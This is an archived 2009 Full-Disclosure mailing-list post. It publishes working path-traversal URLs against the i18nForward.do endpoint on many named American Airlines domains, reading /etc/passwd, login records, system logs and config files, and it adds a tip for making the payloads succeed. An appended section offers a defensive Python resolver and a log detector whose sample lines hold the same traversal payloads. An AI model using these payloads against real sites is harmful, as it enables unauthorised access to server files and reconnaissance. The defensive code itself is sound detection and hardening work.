lists.openwall.net - Open Source and information security mailing list archives
Message-ID: <5f425f480907161839x2829dc61o52821915376183d@mail.gmail.com>
Date: Thu, 16 Jul 2009 20:39:29 -0500
From: Bob Smith <bobbyhadababyitsaboy@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: American Airlines (multiple domains) Local File Include

American Airlines' domains have been vulnerable to Local File Include (I wonder if anyone has flown free using this)

http://www.aa.com.do/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.aa.com.pe/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.be/aa/i18nForward.do?locale=en_GB&p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.ch/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.cl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.cn/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.co.cr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.co.uk/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.de/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.fr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.ie/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.in/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.it/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.jp/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.american-airlines.nl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.aa.com.ve/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.americanairlines.com.au/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.americanairlines.com.ru/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.flagshiplounge.net/aa/i18nForward.do?locale=en_GB&p=
http://www.premiumcustomerservices.net/aa/i18nForward.do?locale=en_GB&p=
http://www.touraa.com/aa/i18nForward.do?p=

and some sensitive files I found

https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/wtmpx
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/logadm.conf
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/messages
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/lib/newsyslog
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/sbin/logadm
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/lastlog
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/netconfig
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/syslog.conf
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/system
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/hosts

screen shots
http://i41.tinypic.com/fcns7t.jpg
http://i25.tinypic.com/359z85z.jpg

it's been reported and they don't feel like responding

(if the page doesn't work try taking off a ../)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
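The bug class in the post is a forwarder that takes a file path straight from a query parameter (`p`) and lets `../` segments walk out of the web root. The following is an added example, not code from the post or from the affected site, showing the two things a defender wants from such a report: a resolver that maps `p` to a file only inside a fixed root (rejecting absolute paths, `..` segments and non-view files), and a detector that flags the same pattern in access logs, including percent-encoded and double-encoded forms. The web root path, the `.jsp`-only rule and the log lines are constructed for the example and are not taken from the post.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Hypothetical web root for the forwarder (assumption for this example).
WEBAPP_ROOT = "/opt/app/webapp"


def decode_fully(value, max_rounds=3):
    """Percent-decode until the value stops changing, so '%2e%2e%2f' and
    double-encoded variants are compared in the same form as a literal '../'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_forward_path(p, root=WEBAPP_ROOT):
    """Map a user-supplied 'p' parameter to a view file under root, or raise
    ValueError. This is the hardened counterpart of a forwarder that joins
    the parameter onto a directory without any check."""
    candidate = decode_fully(p).replace("\\", "/")
    if candidate.startswith("/") or "\0" in candidate:
        raise ValueError("absolute path or NUL byte rejected")
    if any(seg == ".." for seg in candidate.split("/")):
        raise ValueError("parent-directory segment rejected")
    resolved = posixpath.normpath(posixpath.join(root, candidate))
    # Defence in depth: confirm containment even after the segment check.
    if posixpath.commonpath([root, resolved]) != root:
        raise ValueError("resolved path escapes web root")
    if not resolved.endswith(".jsp"):
        raise ValueError("only .jsp views may be forwarded to")
    return resolved


# Constructed sample access-log lines (not real traffic) in common log format,
# using a placeholder host and documentation IP ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Jul/2009:20:39:29 -0500] "GET /aa/i18nForward.do?p=home/index.jsp HTTP/1.1" 200 5120
203.0.113.5 - - [16/Jul/2009:20:40:01 -0500] "GET /aa/i18nForward.do?p=../../../../../../etc/passwd HTTP/1.1" 200 1842
203.0.113.9 - - [16/Jul/2009:20:41:10 -0500] "GET /aa/i18nForward.do?locale=en_GB&p=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1842
203.0.113.9 - - [16/Jul/2009:20:42:33 -0500] "GET /aa/i18nForward.do?p=%252e%252e%252fetc%252fhosts HTTP/1.1" 200 300
198.51.100.2 - - [16/Jul/2009:20:43:00 -0500] "GET /aa/homePage.do HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_traversal(p):
    """True if the (fully decoded) parameter is absolute or contains '..'."""
    v = decode_fully(p).replace("\\", "/")
    return v.startswith("/") or any(seg == ".." for seg in v.split("/"))


def find_traversal_attempts(log_text):
    """Return (ip, path, raw_p, status) for each request whose 'p' parameter
    looks like a traversal attempt. parse_qs decodes once; decode_fully then
    catches the double-encoded case."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for p in parse_qs(parts.query).get("p", []):
            if is_traversal(p):
                hits.append((m.group("ip"), parts.path, p, m.group("status")))
    return hits


if __name__ == "__main__":
    print(resolve_forward_path("home/index.jsp"))
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print("traversal attempt:", hit)
```

A status of 200 on a flagged request is the signal worth alerting on: a hardened forwarder would answer these with an error, so successful responses to traversal-shaped parameters indicate the check is missing.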